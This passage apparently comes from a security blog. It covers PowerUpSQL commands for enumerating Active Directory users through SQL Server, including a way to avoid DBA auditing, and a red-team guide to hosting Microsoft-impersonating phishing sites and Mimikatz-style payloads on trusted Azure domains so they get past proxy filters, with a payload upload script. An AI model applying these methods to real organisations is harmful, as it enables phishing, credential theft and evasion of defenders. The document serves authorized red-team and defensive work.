  • Get-SQLDomainUser – Provides a list of the domain users on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState Disabled – Provides a list of the disabled domain users on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState Enabled – Provides a list of the enabled domain users on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState Locked – Provides a list of the locked domain users on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState PreAuthNotRequired – Provides a list of the domain users that do not require Kerberos preauthentication on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState PwLastSet 90 – Lists users that have not changed their password in the last 90 days. Any number of days can be provided.
  • Get-SQLDomainUser -UserState PwNeverExpires – Provides a list of the domain users whose passwords never expire on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState PwNotRequired – Provides a list of the domain users with the PASSWD_NOTREQD flag set on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState PwStoredRevEnc – Provides a list of the domain users storing their password using reversible encryption on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState SmartCardRequired – Provides a list of the domain users that require a smart card for interactive login on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState TrustedForDelegation – Provides a list of the domain users trusted for delegation on the SQL Server’s domain.
  • Get-SQLDomainUser -UserState TrustedToAuthForDelegation – Provides a list of the domain users trusted to authenticate for delegation on the SQL Server’s domain.
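
For the arbitrary LDAP query function, a hypothetical example is below; the -LdapFilter and -LdapProps parameter names are assumptions here, so check the wiki for the exact syntax:

Get-SQLDomainObject -Verbose -Instance MSSQLSRV04SQLSERVER2014 -LdapFilter '(&(objectCategory=Person)(objectClass=user))' -LdapProps samaccountname,adspath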

Dumping Domain Users Examples

This example shows how to gather a list of enabled domain users using a Linked Server via OPENQUERY.

Get-SQLDomainUser -Instance MSSQLSRV04SQLSERVER2014 -Verbose -UserState Enabled

Alternatively, the command can be run using ad hoc queries via OPENROWSET as shown below. It’s nothing crazy, but it does provide a few options for avoiding detection if the DBAs are auditing for linked server creation, but not ad hoc queries, in the target environment.

Get-SQLDomainUser -Instance MSSQLSRV04SQLSERVER2014 -Verbose -UserState Enabled -UseAdHoc

The functions also support providing an alternative SQL Server login for authenticating to the SQL Server and an alternative Windows credential for configuring server links.  More command examples can be found here.
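
For example, a run using an alternative SQL login plus a Windows credential for the link might look roughly like the line below; the -LinkUsername/-LinkPassword parameter names and the account values are illustrative assumptions:

Get-SQLDomainUser -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Username sqladmin -Password 'SqlPassword1!' -LinkUsername 'demo\windowsuser' -LinkPassword 'WinPassword1!'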

The Authentication and Authorization Matrix

Depending on the current user’s security context or the provided credentials, the user may not have access to query AD for information. The tables below illustrate privileges and the corresponding access.

OPENQUERY (Linked server) auth table by Scott Sutherland (@_nullbind)

Current user context – AD query access:

  • Domain user (public) – No
  • Domain user (sysadmin) – Yes
  • SQL login (public) – No
  • SQL login (sysadmin) – No
  • Domain user (public) + provided domain user – No
  • Domain user (sysadmin) + provided domain user – Yes
  • SQL login (public) + provided domain user – No
  • SQL login (sysadmin) + provided domain user – Yes

OPENROWSET (Ad Hoc query) auth table by Scott Sutherland (@_nullbind)

Current user context – AD query access:

  • Domain user (public) – No
  • Domain user (sysadmin) – Yes
  • SQL login (public) – No
  • SQL login (sysadmin) – Yes
  • Domain user (public) + provided domain user – No
  • Domain user (sysadmin) + provided domain user – Yes
  • SQL login (public) + provided domain user – No
  • SQL login (sysadmin) + provided domain user – Yes

Conclusion

Recon is an essential first step in assessing the security of an Active Directory environment, and much of this capability already exists in PowerView thanks to some great work by Will Schroeder (@harmj0y) and others. Hopefully these AD recon functions will provide another medium to accomplish the same end. For more information on the newly added AD recon functions, check out the PowerUpSQL wiki!


Utilizing Azure Services for Red Team Engagements

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too? Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft’s Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

To be specific, these are services hosted by Microsoft, typically under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

Service – Base Domain – Base Reputation (Web / Weighted) – Subdomain Reputation (Web / Weighted)

  • App Services – azurewebsites.net – Neutral / No Score – Neutral / No Score
  • Blob Storage – blob.core.windows.net – Good / Good – Good / Good
  • File Service – file.core.windows.net – Good / Good – Good / Good
  • AzureSQL – database.windows.net – Good / Good – Good / Good
  • Cosmos DB – documents.azure.com – Neutral / Neutral – Neutral / Neutral
  • IoT Hub – azure-devices.net – Neutral / No Score – Neutral / No Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations above. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we’re just going to focus on the App Services, Blob Storage, and AzureSQL services, but there’s plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score above, but there’s one great benefit from hosting your phishing site with Azure App Services – the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.

Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the base domain (azurewebsites.net) isn’t the most well-known domain on the internet, and it might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here – https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has their own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each Blob is created as a subdomain of the “blob.core.windows.net” domain.

For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.

If you need a primer, check out Microsoft’s documentation here – https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction
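
As a rough end-to-end sketch with the current Az PowerShell module (older AzureRM cmdlets use different names; the account name, key, container, and file below are placeholders):

# storage account access key for the "notpayloads" account from the example above
$storageKey = '<storage account access key>'
$ctx = New-AzStorageContext -StorageAccountName 'notpayloads' -StorageAccountKey $storageKey
# create a container that allows anonymous read access to blobs
New-AzStorageContainer -Name 'updates' -Context $ctx -Permission Blob
# upload the payload; it should land at https://notpayloads.blob.core.windows.net/updates/payload.exe
Set-AzStorageBlobContent -File '.\payload.exe' -Container 'updates' -Blob 'payload.exe' -Context $ctx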

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that’s going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.
